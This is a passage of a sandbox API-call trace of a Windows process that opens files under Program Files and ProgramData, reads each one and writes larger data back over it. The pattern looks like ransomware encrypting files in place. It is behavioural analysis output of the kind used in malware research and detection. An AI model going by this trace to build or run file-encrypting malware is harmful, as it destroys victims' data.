SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x8f0 [0147.622] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0147.623] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0147.623] ReleaseMutex (hMutex=0x168) returned 1 [0147.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YST9YDT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0147.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YST9YDT", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YST9YDT", lpUsedDefaultChar=0x0) returned 7 [0147.623] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b68, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesRead=0x2fdf2bc*=0x8f0, lpOverlapped=0x0) returned 1 [0147.633] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0147.633] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0xe78, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2fdf2d0*=0xe78, lpOverlapped=0x0) returned 1 [0147.634] CloseHandle (hObject=0x1dc) returned 1 [0148.868] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\Welcome.html" (normalized: "c:\\program files (x86)\\java\\jre7\\welcome.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.488] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.488] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3d7 [0149.488] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.488] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.488] ReleaseMutex (hMutex=0x168) returned 1 [0149.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Welcome.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0149.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Welcome.html", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Welcome.html", lpUsedDefaultChar=0x0) returned 12 [0149.488] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3d7, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x2fdf2bc*=0x3d7, lpOverlapped=0x0) returned 1 [0149.503] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0149.503] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x95f, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x95f, lpOverlapped=0x0) returned 1 [0149.503] CloseHandle (hObject=0x1f0) returned 1 [0149.504] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.506] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.506] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x745e [0149.507] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.507] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.507] ReleaseMutex (hMutex=0x168) returned 1 [0149.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sybase.xsl", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0149.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sybase.xsl", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sybase.xsl", lpUsedDefaultChar=0x0) returned 10 [0149.507] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0149.514] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x645e [0149.514] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0149.551] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x645e [0149.551] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0149.552] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0149.552] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0149.552] CloseHandle (hObject=0x1f0) returned 1 [0149.552] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\chrome.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.554] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.554] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x28 [0149.554] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.554] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.554] ReleaseMutex (hMutex=0x168) returned 1 [0149.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome.manifest", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0149.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome.manifest", cchWideChar=15, lpMultiByteStr=0x1f7344c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chrome.manifest", lpUsedDefaultChar=0x0) returned 15 [0149.554] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fa53f8, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fa53f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x28, lpOverlapped=0x0) returned 1 [0149.556] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0149.556] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5b0, lpOverlapped=0x0) returned 1 [0149.556] CloseHandle (hObject=0x1f0) returned 1 [0149.556] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\channel-prefs.js" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\pref\\channel-prefs.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.558] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.558] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x166 [0149.558] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.559] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.559] ReleaseMutex (hMutex=0x168) returned 1 [0149.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="channel-prefs.js", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="channel-prefs.js", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="channel-prefs.js", lpUsedDefaultChar=0x0) returned 16 [0149.559] ReadFile (in: hFile=0x1f0, lpBuffer=0x26a7768, nNumberOfBytesToRead=0x166, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a7768*, lpNumberOfBytesRead=0x2fdf2bc*=0x166, lpOverlapped=0x0) returned 1 [0149.560] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0149.560] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x6ee, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2fdf2d0*=0x6ee, lpOverlapped=0x0) returned 1 [0149.560] CloseHandle (hObject=0x1f0) returned 1 [0149.561] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\notepad.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\notepad.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.561] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\notepad.exe", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Mozilla Firefox\\notepad.exe", lpFilePart=0x2fdf690*="notepad.exe") returned 0x32 [0149.561] GetLastError () returned 0x20 [0149.561] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x51 [0149.561] LocalFree (hMem=0x696c00) returned 0x0 [0149.562] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0149.562] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0149.563] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0149.563] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0149.563] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\notepad.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\notepad.exe")) returned 0x20 [0149.563] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.564] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.564] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x383 [0149.564] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.564] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.564] ReleaseMutex (hMutex=0x168) returned 1 [0149.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="softokn3.chk", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0149.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="softokn3.chk", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="softokn3.chk", lpUsedDefaultChar=0x0) returned 12 [0149.565] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x383, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x2fdf2bc*=0x383, lpOverlapped=0x0) returned 1 [0149.566] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0149.566] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x90b, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2fdf2d0*=0x90b, lpOverlapped=0x0) returned 1 [0149.566] CloseHandle (hObject=0x1f0) returned 1 [0149.567] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\webapprt.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\webapprt.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.568] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.568] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1e7 [0149.568] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.568] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.568] ReleaseMutex (hMutex=0x168) returned 1 [0149.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="webapprt.ini", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0149.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="webapprt.ini", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webapprt.ini", lpUsedDefaultChar=0x0) returned 12 [0149.568] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1e7, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2fdf2bc*=0x1e7, lpOverlapped=0x0) returned 1 [0149.569] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0149.569] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x76f, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2fdf2d0*=0x76f, lpOverlapped=0x0) returned 1 [0149.569] CloseHandle (hObject=0x1f0) returned 1 [0149.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.570] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", lpFilePart=0x2fdf690*="Workflow.Targets") returned 0x5a [0149.571] GetLastError () returned 0x5 [0149.571] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0149.571] LocalFree (hMem=0x69e2b0) returned 0x0 [0149.571] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0149.571] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0149.571] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0149.571] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0149.572] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.targets")) returned 0x20 [0149.572] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\wab.exe" (normalized: "c:\\program files (x86)\\windows mail\\wab.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.575] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Mail\\wab.exe", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Mail\\wab.exe", lpFilePart=0x2fdf690*="wab.exe") returned 0x2b [0149.575] GetLastError () returned 0x5 [0149.575] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0149.575] LocalFree (hMem=0x69e2b0) returned 0x0 [0149.575] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0149.575] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0149.576] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0149.576] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0149.576] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\wab.exe" (normalized: "c:\\program files (x86)\\windows mail\\wab.exe")) returned 0x20 [0149.577] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\operamail.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\operamail.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.577] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\operamail.exe", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Photo Viewer\\operamail.exe", lpFilePart=0x2fdf690*="operamail.exe") returned 0x39 [0149.577] GetLastError () returned 0x20 [0149.578] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x51 [0149.578] LocalFree (hMem=0x696c00) returned 0x0 [0149.578] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0149.578] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0149.578] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0149.578] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0149.578] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\operamail.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\operamail.exe")) returned 0x20 [0149.578] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.580] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.580] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x10e3000 [0149.580] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0149.581] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.581] ReleaseMutex (hMutex=0x168) returned 1 [0149.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrUpd10110_MUI.msp", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0149.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrUpd10110_MUI.msp", cchWideChar=23, lpMultiByteStr=0x1f88b2c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdbeRdrUpd10110_MUI.msp", lpUsedDefaultChar=0x0) returned 23 [0149.581] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0149.585] ReadFile (in: 